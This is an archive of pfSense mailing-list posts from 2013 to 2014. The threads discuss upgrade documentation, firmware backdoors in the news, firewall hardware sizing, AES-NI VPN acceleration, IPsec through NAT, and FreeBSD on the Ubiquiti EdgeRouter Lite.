On Oct 12, 2013, at 3:33 PM, Thinker Rix thinke...@rocketmail.com wrote: Hello all, I just performed an upgrade to 2.1 via the Auto update feature in the web UI, which worked flawlessly. When studying the Upgrade Guide (https://doc.pfsense.org/index.php/Upgrade_Guide) prior the upgrade I could not find any information about it. Is there a way I can update the guide myself? Otherwise maybe someone with writing rights to the CMS wants to update the manual. Cheers Thinker Rix P.S. Maybe an update to this page would be convenient, too: https://doc.pfsense.org/index.php/Can_I_upgrade_my_pfSense_through_the_web_interface%3F My immediate suggestion is to edit a copy of the page (it’s a wiki, so “view source”), perform a ‘diff’ and send the result to coreteam-at-pfsense-dot-org. Jim ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] naive suggestion: conform to US laws
On Oct 12, 2013, at 1:35 PM, Chris L c...@viptalk.net wrote: On 2013-10-12 01:40, Jim Thompson wrote: I'm not willing to endure this uninformed Alex Jonesian crapfest. Nice position to take, except Alex Jones was right. Sigh. As much as this doesn’t belong on the pfsense list… I actually know Alex, or did, 13 year ago. I got friendly enough with him back in the mid-late 90s that we had each other’s cell phone numbers. Back then Jamie and I were involved with Fringeware. http://en.wikipedia.org/wiki/FringeWare_Review http://www.austinchronicle.com/issues/vol16/issue26/screens.fringeware.html Fringeware became an advertiser on Alex Jones' radio show (on KLBJ, before he got booted). On the front-end, I was a respected advertiser. Meanwhile, others associated with Fringeware were culture-jamming him on the back-end. the result: #discordia Oh, the memories this brings back. (As you’ll see, the FBI showed up to demand something, didn’t have a warrant, and was shown the sidewalk.) http://www.wingtv.net/thorn2006/jarhead.html http://www.austinchronicle.com/news/2000-07-14/77932/ Clayton, btw is a dear friend. Easily one of the most brilliant people I’ve ever known. I hope he speaks at my funeral. Other fun was had at Fringeware. We supported the Yes Men (http://en.wikipedia.org/wiki/The_Yes_Men) We actually hosted their website, as well as that of RTmark for a period in the late 90s on the same machine used for smallworks.com (which was originally the corporation behind the firewall named “Netgate”), fringeware.com, etc. One of their pranks was that they setup a website named www.gwbush.com. (http://en.wikipedia.org/wiki/The_Yes_Men#George_W._Bush http://theyesmen.org/hijinks/gwbush http://www.rtmark.com/bush.html) which resulted in Bush’s famous There ought to be limits to freedom,” quote. http://www.rtmark.com/bushpr2.html The great untold story on this is that all these websites were hosted in a shitty office building on Shoal Creek Blvd, one floor up from the then offices of Karl Rove Associates” even as they fought to shutdown gwbush.com. The #irony was delicious, and they never succeeded. :-) Anyway, you might want to study up on STRATFOR, or Mary Maroney, who was the editor and chief of Infowars magazine until earlier this year. Maroney formerly worked for Stratfor and Parker Media here in Austin. If you don’t know who they are, then I suggest more research on your part. Have fun, but be careful when you enter the rabbit hole. Snowden and Manning are both late-comers to the party: http://www.newyorker.com/reporting/2011/05/23/110523fa_fact_mayer?currentPage=all http://www.technologyreview.com/news/519661/nsas-own-hardware-backdoors-may-still-be-a-problem-from-hell/ http://cryptome.org/nsa-ssl-email.htm http://news.cnet.com/8301-31921_3-20017671-281.html http://www.wired.com/images_blogs/threatlevel/2013/09/15-shumow.pdf (see also: http://www.wired.com/threatlevel/?p=85661) http://arstechnica.com/security/2013/01/secret-backdoors-found-in-firewall-vpn-gear-from-barracuda-networks/ http://dl.packetstormsecurity.net/papers/general/my_research1.pdf http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.154.825 / http://www.cs.ucf.edu/~czou/research/Chipset%20Backdoor-AsiaCCS09.pdf (now consider all the cheerleading for Intel Ethernet chips on the various pfSense lists…) Jim ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
[pfSense] not all backdoors are NSA backdoors
It occurs to me that being more ‘conversational’ with the community might be a good thing. Describing what is happening with pfSense, and why, and engaging the pfsense community in the process could be a good thing. My first attempt is included herein. But first, on the tail of the recent thread that erupted here, consider this backdoor that someone (?) recently (?) discovered (?) in the firmware for certain D-link routers: http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/ If you read the article, the user agent string that bypasses authentication (according to the post) can be read backwards as Edit by 04882 Joel Backdoor”. One possible Joel is Joel Liu, Senior Director-Chief Technology Office Alpha Networks: http://www.joesdata.com/executive/Joel_Liu_421313008.html Alpha Networks being a spin-off of D-Link. http://www.alphanetworks.com/_english/06_about/01_detail.php?appid=143pid=12 They have a GPL compliance office: http://www.alphanetworks.com/_english/10_gpl/gpl.php, but you can bet they won’t ship you that source code. [Normally, if one is going to hide secret strings inside the binary, one also obfuscates them. An example: http://www.codeproject.com/Articles/502283/Strings-Obfuscation-System] ... In some respects, the recent thread was about fear of asymmetric information, that those inside ESF have information and access that the community does not. In contract theory and economics, information asymmetry deals with the study of decisions in transactions where one party has more or better information than the other. In contrast to neo-classical economics which assumes perfect information, this is about What We Don't Know. This creates an imbalance of power in transactions which can sometimes cause the transactions to go awry, in the worst case a kind of market failure. Specific to the subject, the information asymmetry here is the community’s supposed inability to observe and/or verify ESF's actions. To the best of our ability so far, pfSense is both observable and verifiable. The source code is on github (https://github.com/pfsense/), and the build process is quasi-documented.Getting something like the ‘backdoor by Joel’ above into the codebase without detection would be difficult if not impossible. (There are more subversive means, which I touched on mid-thread, but they still fail in the presence of a public development process.) Frankly, (between you and I), the pfSense build process could be better documented. Truth be told: the build system for pfSense is archaic. Nobody associated with it (at this point) likes it. Simultaneously, everyone is afraid to replace it. “There be dragons…” An action-item post 2.2 (and it’s move to FreeBSD 10) is to clean-up the build system, possibly making it more like that which builds FreeBSD, rather than the mess of shell (and PHP) scripts that exists now. Having a cleaner build system could lead to better verification of the resultant bits. Another issue is the proliferation of pfSense mirrors. How do we (all) trust the bits on these mirrors, given that they’re run by parties entirely independent and remotely located from ESF? One possible solution: signed packages, and there was a bit of infrastructure put in-place just prior to the 2.1 release. We’ve yet to accomplish the rest of this, but.. it’s coming. As always, if you have ideas(*), bring them forward. Jim (*) that don’t involve re-incorporating as a non-US, non-profit company… ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] naive suggestion: conform to US laws
On Oct 15, 2013, at 8:53 AM, Alex DiMarco a...@cs.toronto.edu wrote: On Tue, Oct 15, 2013 at 8:20 AM, Robert Skinner rob...@robertskinner.com wrote: You would have hated the 90s then. Interesting time that was, no particular hate though for that period.. Now the 80's on the other hand :*) It was only the music that sucked in the 80s… Oh, and the clothing / hair styles, and the politics, and … :-) Though annoying at times, these displays on mailing lists have also sparked some great technology projects too. Those around in the early BSD days recall such episodes. Not that I am promoting or encouraging such behavior. There is no doubt great technology has emerged from conflict; verbal and otherwise. I think I may be an optimist with a belief that if we choose to interpret intentions in a positive way even when they are communicated otherwise, we can potentially do even greater things... maybe I am choosing to be naive... but then, that is the title of this thread You will always have “that guy”, at a bar now and then, but as long as it’s not a bar full of that personality. I think unfortunately all of us have had the privilege of being that guy at the bar - I know I have a few times even without the Guinness or Scotch flowing 8*] So what excuse do I have, given that I was stone sober? (In France at the time, but still… sober.) Jim ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] Hardware requirements for gigabit wirespead
On Oct 24, 2013, at 12:02 PM, Chris Bagnall pfse...@lists.minotaur.cc wrote: On 24/10/13 5:30 pm, Thinker Rix wrote: I want to have: - full Gigabit wire speed between the DMZ and the LAN zone (i.e. 2x Gigabit at max) Would have thought you'd be fine here. - full 450Mbps between the WLAN and pfsense Even with 450Mbps *radios* I'd be amazed if you get more than ~80Mbps out of your WLAN. Not a pfSense limitation, just a reality of WLAN claimed radio speeds. I generally expect to see ~55-65Mbps out of 2x2 radios, so ~80Mbps out of 3x3 is probably realistic. depends on your RF environment and channel orthogonality. Unless you're in a really isolated area, using an 80Mhz channel (which is what you'd need for 450Mbps radio speed) will slaughter spectrum availability for your neighbours. Short of really needing that speed, try to stick with 20Mhz channels where possible. And if you're in a very congested WiFi area, you may even get better speeds out of 20Mhz (much easier to find one free 20Mhz channel than a free 80Mhz channel). - maximal VPN speed without speed break due to hardware limitations, i.e. as near to wire speed as possible Depends on your choice of crypto algorithm and whether you can do it in hardware. I’d recommend for a CPU that supports AES-NI, even if the FreeBSD support for same turns out to be lagging. ‘wire speed’ would need to be defined. I do know of boxes that will run at 25Gbps. As the guy at the hot rod shop told me 30 years ago, “Speed costs money son. How fast do you want to go? 1. Would the Core2Duo CPU be sufficient for my requirements or should I chose the 2,4 GHz Quad-core, the 2,89 GHz-Quad-core or maybe an even a more powerful CPU or totally different setup? When I was deploying a Quagga-based BGP setup in a datacentre a couple of years ago, the general consensus was that cores are more important than raw clock speed - so 4x2.4Ghz is better than 2x3.4Ghz - at least when using multiple interfaces. That’s not what I’d have guessed. If your application load is single-threaded (or a single process), then clock speed will win every time. If your application (load) can be broken down into prices that execute in parallel, then cores will be a win. You’ve not specified the problem well enough to discuss. An AS with internal BGP (iBGP) must have all of its iBGP peers connect to each other in a full mesh (where everyone speaks to everyone directly). This full-mesh configuration requires that each router maintain a session to every other router. In large networks, this number of sessions may degrade performance of routers, due to either a lack of memory, or too much CPU process requirements. There will also need be some serious consideration on the reliability of the network, and its constituent part(s). If those wireless links are for exterior paths, and not simply 802.11 LANs, then you’re in for a huge amount of trouble, as wireless isn’t reliable. At all. This was, however, with Linux hosts. One of the nice things about those Intel server cards is the ability to lock NIC affinity to CPUs/cores, so you can effectively task a core to one or more NIC ports. But that would require completely re-archtecting the application(s). Hopefully others will chime in as to whether the same is true with FreeBSD - I seem to recall there were SMP/multi-core efficiency issues with earlier FreeBSD versions - hopefully those have been ironed out by now. 2. Is there any other bottle neck that will prevent my performance requirements? Bonding is not a guarantee of doubled speeds. In my experience, bonding 2 gigabit NICs will generally yield around 1.2-1.4Gbps raw throughput. You are very unlikely to get 2Gbps. Bonding is more about redundancy (failover) than throughput at this level. If you really need 1Gbps, you're going to have to consider 10GE kit. 3. When bonding the NICs, I was planning to use a port on each of the PCIe cards so to have a little bit of redundancy should an expansion card fail. Will there be significant performance losses due to this spread over 2 expansion cards, so that it would be much better to bond two NICs that live on the same expansion card and forget about the additional redundancy? No, I agree that bonding 2 ports on separate cards is the best option. You're already thinking redundancy with the multiple NIC considerations, but in my experience, NICs don't really fail that often - at least not compared to fans, power supplies and other PC components. Consider whether a 2x pfSense cluster in CARP might be more to your needs if redundancy/failover is a critical requirement. Looking at your hardware again, you've specced 12 NICs, but from what I can see from your config, you only need 8 (2 VDSL ports, 2 bonded ports for LAN, 2 bonded ports for DMZ, (assuming) 2 bonded ports for WLAN). 4x on-board Realtek 8111C Gigabit NICs Personally
Re: [pfSense] Hardware requirements for gigabit wirespead
The topic has wandered away from pfSense. -- Jim On Oct 24, 2013, at 18:48, Chris Bagnall pfse...@lists.minotaur.cc wrote: On 24/10/13 7:31 pm, Adam Thompson wrote: If I upgraded to a better-quality unit, or switched to licensed spectrum, I could probably eliminate the variability and increase speed simultaneously. Indeed, we have Ubiquiti kit running point to point links in the 5Ghz unlicensed spectrum (band C) over around 18km which deliver ~65Mbps throughput. I think our distance record is just shy of 68km. Within the Ubiquity line, the AirFiber apparently would get me to ~99.99% reliability at ~600Mbps, or ~99.9% reliability at ~1Gbps. Still using unlicensed spectrum, using the built-in directional antennas. Do check the 24Ghz spectrum rules carefully in your jurisdiction - certainly here in the UK the 24Ghz unlicensed spectrum is limited, and only allows fairly low power without a licence. I do not have personal experience with Alvarion, but I can unreservedly recommend Dragonwave. I'd add Motorola Orthogon kit to that list, based on some offshore experience with it a few years ago. Kind regards, Chris -- This email is made from 100% recycled electrons ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] Disk Read failure (but it seems to work anyway)
https://doc.pfsense.org/index.php/DMA_and_LBA_Errors On Mon, Oct 28, 2013 at 12:18 PM, Bob Gustafson bob...@rcn.com wrote: I installed 2.1 on a SanDisk 4GB Ultra (200x) for use on an Alix board. I configured the ethernet ports using the serial connection and then left the connection and minicom running while I did more configuration using the ethernet webConfigurator. Every time I would make a change to the configuration, I get: ad0: FAILURE - READ status=51READY,DSC,ERROR error=10NID_NOT_FOUND LBA=78139 ad0: FAILURE - READ status=51READY,DSC,ERROR error=10NID_NOT_FOUND LBA=78139 ad0: FAILURE - READ status=51READY,DSC,ERROR error=10NID_NOT_FOUND LBA=78139 ad0: FAILURE - READ status=51READY,DSC,ERROR error=10NID_NOT_FOUND LBA=78139 from the serial port. Even though it says FAILURE, the configuration was retained. (Perhaps a power cycle will wipe it out. Will power cycle in a minute and report here) Can I do something to fix the problem, or eliminate the messages? Perhaps the SanDisk Ultra is too fast? I picked it more for reliability than speed. Perhaps it was not a good choice. - On power cycle, there were some read errors: ...uhub0: 4 ports with 4 removable, self powered ad0: FAILURE - READ status=51READY,DSC,ERROR error=10NID_NOT_FOUND LBA=78139 ad0: FAILURE - READ status=51READY,DSC,ERROR error=10NID_NOT_FOUND LBA=78139 Root mount waiting for: usbus1 uhub1: 4 ports with 4 removable, self powered Trying to mount root from ufs:/dev/ufs/pfsense0 Configuring crash dumps... Mounting filesystems... Setting up memory disks... done. Disabling APM onad0: FAILURE - SETFEATURES 0x85 status=51READY,DSC,ERROR erro /dev/ad0 ... but it seems all of my configuration information was retained. Bob G __**_ List mailing list List@lists.pfsense.org http://lists.pfsense.org/**mailman/listinfo/listhttp://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] AES-NI support of the CPU: Does it make sense for VPN with pfSense?
On Nov 6, 2013, at 7:22, Vick Khera vi...@khera.org wrote: pfSense lists the AES-NI as a supported option for crypto acceleration. pfSense will use it for OpenVPN and IPsec if you tell it to. There's a config setting for it. I'm not aware if any performance testing for AES-NI on pfSense. There are reports that FreeBSD doesn't support AES-NI very well. Jim ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] AES-NI support of the CPU: Does it make sense for VPN with pfSense?
On Nov 6, 2013, at 8:06 AM, Thinker Rix thinke...@rocketmail.com wrote: On 2013-11-06 15:29, Jim Thompson wrote: On Nov 6, 2013, at 7:22, Vick Khera vi...@khera.org wrote: pfSense lists the AES-NI as a supported option for crypto acceleration. pfSense will use it for OpenVPN and IPsec if you tell it to. There's a config setting for it. I'm not aware if any performance testing for AES-NI on pfSense. There are reports that FreeBSD doesn't support AES-NI very well. Thank you for this information, Jim. So I figure, that buying the Xeon just for it's AES functions would (currently) be a waste of money. I can’t answer this, because I’ve not tested it. I know that the linux kernel, and openbsd both take full advantage of AES-NI instructions. http://ibatanov.blogspot.com/2012/04/ipsec-performance-benchmarking-is-end.html http://comments.gmane.org/gmane.os.openbsd.misc/199639 I know there is an implementation of AES-NI for cryptdev, but **I HAVE NOT TESTED IT (nor has anyone else on the pfSense team, AFAIK). There seems to be an issue: http://forum.pfsense.org/index.php/topic,54008.30.html http://lists.freebsd.org/pipermail/freebsd-hackers/2012-May/038762.html In the meantime, it might be possible to use OpenVPN with a patched openssl library to achieve the results you desire (but now you’re off into DIY land.) https://community.openvpn.net/openvpn/wiki/Gigabit_Networks_Linux That all said, we will find and fix the issue at some point. (I’m actually in San Jose for the FreeBSD Vendor Summit, and plan to bring it up as a potential issue.) Jim ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] AES-NI support of the CPU: Does it make sense for VPN with pfSense?
The issue may not be that easy to fix. Current theory is that it's is a structural issue in cryptdev. -- Jim On Nov 6, 2013, at 20:59, Chris Buechler c...@pfsense.org wrote: I have done some brief testing of AES-NI a few months back, though I can't seem to find the results at the moment and that test environment isn't online currently. It doesn't give the performance benefit that it should at this time. So the immediate benefit is minimal (except for the fact the Xeon proc would be faster than the Pentium), but it will be properly supported in the future, hopefully in 2.2 with its FreeBSD 10 base, but we haven't done any testing there yet. On Tue, Nov 5, 2013 at 11:53 PM, Thinker Rix thinke...@rocketmail.com wrote: Hello all, as I am planning to buy new hardware for pfSense, I was wondering if it is worthy to buy a CPU that supports AES new instructions, i.e. hardware-support for AES encyption. Would pfSense use this CPU instructions so to hardware-encrypt/decrypt all VPN traffic (openVPN)? Woud pfSense benefit from this in any other way, too? The motherboards that I want to buy unfortunately support AES-NI only with Xeons that currently start from approx 170 €. If I would take a CPU without AES-IN, I could go with a dual-Pentium for 40€. What impact would you expect from AES-IN, in regards to the fact tht I will be having traffic from VPN secured WLAN with approx 300-450 Mpbs and VPN to/from the internet, 1-2 users at a time max. Do you think the AES-IN would be worthy the price premium of the Xeon for my case, e.g. because it would reduce VPN latency, etc., or is it just a pure waste of money in my case? Best regards Thinker Rix ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] AES-NI support of the CPU: Does it make sense for VPN with pfSense?
The Xeon CPUs are almost idle. The old Intel 32-bit Pentium 4 2.4GHz dual core server, however is the other end of that IPSEC tunnel. It's unlikely to be as idle as the Xeon. -- Jim On Nov 6, 2013, at 8:04, Thinker Rix thinke...@rocketmail.com wrote: On 2013-11-06 15:22, Vick Khera wrote: On Wed, Nov 6, 2013 at 12:53 AM, Thinker Rix thinke...@rocketmail.com wrote: Would pfSense use this CPU instructions so to hardware-encrypt/decrypt all VPN traffic (openVPN)? Woud pfSense benefit from this in any other way, too? pfSense lists the AES-NI as a supported option for crypto acceleration. pfSense will use it for OpenVPN and IPsec if you tell it to. There's a config setting for it. As to your question of is it worth the cost, that depends on how much VPN traffic you have. The Xeon will handle a damn lot of traffic all on its own. If you are pushing more than 40Mbps on the VPN, then perhaps consider the extra cost. If it is low, like under 5 or 10Mbps, then I'd probably suggest that it is not worth the cost. As a reference, between my data center and my primary office, I have an IPsec tunnel. The office runs on an old Intel 32-bit Pentium 4 2.4GHz dual core server. The data center runs on Intel Xeon E31220L @ 2.20GHz quad-core. Neither one has any built-in cryptodev supported devices. The IPsec tunnel maxes out at about 20Mbps during large file backups. I don't think it would go any faster with hardware acceleration, and the load on these boxes hovers around 0 still. The data center firewall is also busy pushing over 100Mpbs of regular traffic to hundreds of clients as well. Hi Vick, Thank you for your reference, it is very valuable for me! I guess I will go with a Pentium (Ivy Bridge) 2x 3.0 GHz CPU. What do you think is the reason for your VPN traffic maxing out at 20Mpbs (I assume that your connection is not the traffic bottle neck, right?), although your CPUs are almost idle? Best regards Thinker Rix ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] AES-NI support of the CPU: Does it make sense for VPN with pfSense?
I was at the FreeBSD Vendor Summit last week, and raised the AES-NI issue as important to be solved in the next six months. The issue and fix are understood, it just needs someone to implement it (and then, presumably, backport it to 8.3, so we can release an update to 2.1 (2.1.1 or similar). Jim On Fri, Nov 8, 2013 at 12:33 PM, Thinker Rix thinke...@rocketmail.com wrote: Hi all, On 2013-11-06 07:53, Thinker Rix wrote: as I am planning to buy new hardware for pfSense, I was wondering if it is worthy to buy a CPU that supports AES new instructions, i.e. hardware-support for AES encyption. As I learned in this thread (big thanks to everybody participating), AES-NI is adding no value to pfSense currently, at all. So currently the only solution is to throw GHz at the problem. Searching myself through the web to learn what CPU speed I would need to achieve my desired 450 MBit/s VPN (or come at least somewhat close to this theoretical max), I found this: http://forums.freenas.org/threads/encryption-performance-benchmarks.12157/ I copied those measurements found there into a spreadsheet so to analyze those values. If anybody is interested in this spreadsheet (.ods), I can send it to him via private mail (I guess binaries are not allowed in the mailing list). Just drop me a message. Regards Thinker Rix ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] AES-NI support of the CPU: Does it make sense for VPN with pfSense?
I think the people with the relevant skill are willing to fix it, when they're show that what they did (cryptdev support) doesn't provide any benefit. read: it's being taken care of. On Mon, Nov 11, 2013 at 1:20 PM, Vick Khera vi...@khera.org wrote: Did you get the sense people with the relevant skill were open to a bounty for implementing the necessary fixes? On Mon, Nov 11, 2013 at 1:36 PM, Jim Thompson j...@netgate.com wrote: I was at the FreeBSD Vendor Summit last week, and raised the AES-NI issue as important to be solved in the next six months. The issue and fix are understood, it just needs someone to implement it (and then, presumably, backport it to 8.3, so we can release an update to 2.1 (2.1.1 or similar). Jim On Fri, Nov 8, 2013 at 12:33 PM, Thinker Rix thinke...@rocketmail.com wrote: Hi all, On 2013-11-06 07:53, Thinker Rix wrote: as I am planning to buy new hardware for pfSense, I was wondering if it is worthy to buy a CPU that supports AES new instructions, i.e. hardware-support for AES encyption. As I learned in this thread (big thanks to everybody participating), AES-NI is adding no value to pfSense currently, at all. So currently the only solution is to throw GHz at the problem. Searching myself through the web to learn what CPU speed I would need to achieve my desired 450 MBit/s VPN (or come at least somewhat close to this theoretical max), I found this: http://forums.freenas.org/threads/encryption-performance-benchmarks.12157/ I copied those measurements found there into a spreadsheet so to analyze those values. If anybody is interested in this spreadsheet (.ods), I can send it to him via private mail (I guess binaries are not allowed in the mailing list). Just drop me a message. Regards Thinker Rix ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] Compile on Sun v215
Unlikely. -- Jim On Dec 9, 2013, at 4:07, Denny Fuchs linuxm...@4lin.net wrote: hi, I want to use old two of Sun Fire SPARC v215 for pfsense. FreeBSD 8/98 runs without any problems, so the only question is, if it does make sense to compile pfsense on that hosts. Ram: 12GB # cat /proc/cpuinfo cpu: TI UltraSparc IIIi (Jalapeno) fpu: UltraSparc IIIi integrated FPU pmu: ultra3i prom: OBP 4.22.33 2007/06/18 12:47 type: sun4u ncpus probed: 2 ncpus active: 2 D$ parity tl1: 0 I$ parity tl1: 0 cpucaps: flush,stbar,swap,muldiv,v9,ultra3,mul32,div32,v8plus,vis,vis2 Cpu0ClkTck: 59a53800 Cpu1ClkTck: 59a53800 MMU Type: Cheetah+ State: CPU0:online CPU1:online cu denny ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] IPSec problem with mobile IOS and Android
you lost me at “port forwarding”. Making NAT work for IPSEC (passthrough) can be … quite challenging. Hopefully you’re attempting to terminate IPSEC on the pfSense box, and the ISP router is configured to: IP Protocol ID 50: For both inbound and outbound filters. Should be set to allow Encapsulating Security Protocol (ESP) traffic to be forwarded. IP Protocol ID 51: For both inbound and outbound filters. Should be set to allow Authentication Header (AH) traffic to be forwarded. UDP Port 500: For both inbound and outbound filters. Should be set to allow ISAKMP traffic to be forwarded. Note that ‘forwarding’ here is packet forwarding, not port forwarding. If so, I’ve simply misunderstood you. If not, you’re not going to make it work without a TON of work on NAT-traversal. You say you looked at: https://doc.pfsense.org/index.php/Mobile_IPsec_on_2.0 (I think). Commercial support is available if you need it. Jim On Jan 4, 2014, at 5:03 PM, Carlos Vicente cjpvice...@gmail.com wrote: Hi all, I have a problem with an IPSec VPN from mobile clients (IOS and Android). I can establish the tunnel but can’t ping, RDP or SSH the pfSense or any client behind it (which is working with OpenVPN). I see the “passed” logs on the firewall tab but can’t access the systems. My pfSense WAN is on the same subnet as the LAN of the ISP router, which has port forwarding of ESP, AH and IKE to the pfSense WAN network adapter. All the rules are correct and I they appear correctly on logs. My PfSense version is 2.0.3 upgraded from 1.2.3. I have tried all kind of configs from the doc “Mobile IPsec on 2.0”, but, as I said, can establish the connection but can´t access any device on LAN subnet. I use this excellent appliance for many years, so I must have IPSec VPN working on mobile clients the same way I have them working with OpenVPN. I’m stuck here, so any help would be very appreciated. Thanks. CV ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] Apple Messages Blocked
Turning on UPNP might make things better. It just works for me, too. -- Jim On Jan 15, 2014, at 10:00, Vick Khera vi...@khera.org wrote: On Tue, Jan 14, 2014 at 3:01 PM, Paul Galati paulgal...@gmail.com wrote: I have tried searching the forums for find a fix to allow Apple Messages app to successfully connect using Audio, Video, or Screen Sharing. It just works for me. I have pfSense protecting my home network, sitting behind a NAT from Verizon FiOS even (so my internal is double NATted.) I have done facetime chats with my kids on the computers at home which is the same as the Messages app and me on a computer and/or my phone in another state. I allow the internal computers to make all outbound connections, though, so that may be a difference in your configuration. ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] January Project News
It still needs attention in the editing and formatting departments, but all the tech is there, yes. -- Jim On Jan 21, 2014, at 5:00, Michał Karas m.ka...@hafis.pl wrote: Hi, than you for your reply. Is the electronically available version already finished. Does it cover all features of PFSense 2.0/2.1 ? Best Michał On Tue, Jan 21, 2014 at 11:54 AM, Chris Buechler c...@pfsense.org wrote: On Tue, Jan 21, 2014 at 4:40 AM, Michał Karas m.ka...@hafis.pl wrote: Hello Chris, any updates on new PFSense book ? When will it be published ? Still to be determined. It's already available for subscribers @ portal.pfsense.org in PDF, mobi and epub. Individual electronic copy sales will come at some point. ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list -- Me-totemo-utsukushi-i-desu-ne totemo- utsukushi-i-me-wo-shitemasu - Mitch Ikeda ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] FreeBSD 10.0 on Ubiquiti EdgeRouter Lite
Thanks for this. As before, we'll supply a solution for pfSense on the ERL after 2.2 (based on FreeBSD 10) after 2.2 drops. -- Jim On Feb 11, 2014, at 7:25, Eugen Leitl eu...@leitl.org wrote: http://rtfm.net/FreeBSD/ERL/ FreeBSD 10.0 on Ubiquiti EdgeRouter Lite The Ubiquiti EdgeRouter Lite is a neat little device that costs less than US$100, has three Ethernet ports, and can run FreeBSD/mips. It's based on the Cavium Octeon CN5020 platform and features a dual core 500mhz MIPS64 processor, 512MB RAM, and 4GB storage on removable USB. The EdgeRouter Lite in the foreground, near a Netgear WNDR3700 and a bulky ISP-provided cablemodem. This page provides ready-to-use images of FreeBSD 10.0-RELEASE. Thanks to the open nature of the EdgeRouter Lite, it's very easy to install and use these images; just follow the instructions below. Thanks to the fine folks at the FreeBSD Project, building your own is almost as easy. A script to build them, along with instructions, is also provided. Special thanks is due to Juli Mallett and Warner Losh, without whose hard work and generous assistance none of this would be possible. Note that this is experimental software which comes with no warranty of any kind. These builds are works in progress and are not fit or suitable for any purpose whatsoever. By proceeding you assume all risks. On my EdgeRouter Lite, the builds provided below are stable and pretty much fully functional. There are two outstanding issues: Performance could be a little better, though it's more than adequate for my home Internet connection. Basic packet passing between two Gigabit hosts seems to top out at about 250Mbits/sec. There is currently no way to pass boot options (such as single-user mode) to the kernel from U-Boot. Hardware crypto acceleration via /dev/crypto seems to work. Use AES in CBC mode to see a huge speedup over CTR. etc. ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] FreeBSD 10.0 on Ubiquiti EdgeRouter Lite
On Feb 12, 2014, at 9:05 AM, David Burgess apt@gmail.com wrote: On Feb 11, 2014 5:55 AM, Jim Thompson j...@netgate.com wrote: Thanks for this. As before, we'll supply a solution for pfSense on the ERL after 2.2 (based on FreeBSD 10) after 2.2 drops. -- Jim That's great news. Does anybody care to speculate whether FreeBSD will be able to take advantage of the packet forwarding acceleration of this hardware at some point you know it’s ipv4-only, right? (there should be a layer2 version as well, but you can’t run both.) jim ___ List mailing list List@lists.pfsense.org http://lists.pfsense.org/mailman/listinfo/list
Re: [pfSense] FreeBSD 10.0 on Ubiquiti EdgeRouter Lite
The reality is “when it’s done”. I’m hoping for “mid-May”. On Feb 12, 2014, at 9:28 AM, Brian Caouette bri...@dlois.com wrote: What is the time frame for 2.2? On 2/11/2014 7:55 AM, Jim Thompson wrote: Thanks for this. As before, we'll supply a solution for pfSense on the ERL after 2.2 (based on FreeBSD 10) after 2.2 drops. -- Jim On Feb 11, 2014, at 7:25, Eugen Leitl eu...@leitl.org wrote: http://rtfm.net/FreeBSD/ERL/ FreeBSD 10.0 on Ubiquiti EdgeRouter Lite The Ubiquiti EdgeRouter Lite is a neat little device that costs less than US$100, has three Ethernet ports, and can run FreeBSD/mips. It's based on the Cavium Octeon CN5020 platform and features a dual core 500mhz MIPS64 processor, 512MB RAM, and 4GB storage on removable USB. The EdgeRouter Lite in the foreground, near a Netgear WNDR3700 and a bulky ISP-provided cablemodem. This page provides ready-to-use images of FreeBSD 10.0-RELEASE. Thanks to the open nature of the EdgeRouter Lite, it's very easy to install and use these images; just follow the instructions below. Thanks to the fine folks at the FreeBSD Project, building your own is almost as easy. A script to build them, along with instructions, is also provided. Special thanks is due to Juli Mallett and Warner Losh, without whose hard work and generous assistance none of this would be possible. Note that this is experimental software which comes with no warranty of any kind. These builds are works in progress and are not fit or suitable for any purpose whatsoever. By proceeding you assume all risks. On my EdgeRouter Lite, the builds provided below are stable and pretty much fully functional. There are two outstanding issues: Performance could be a little better, though 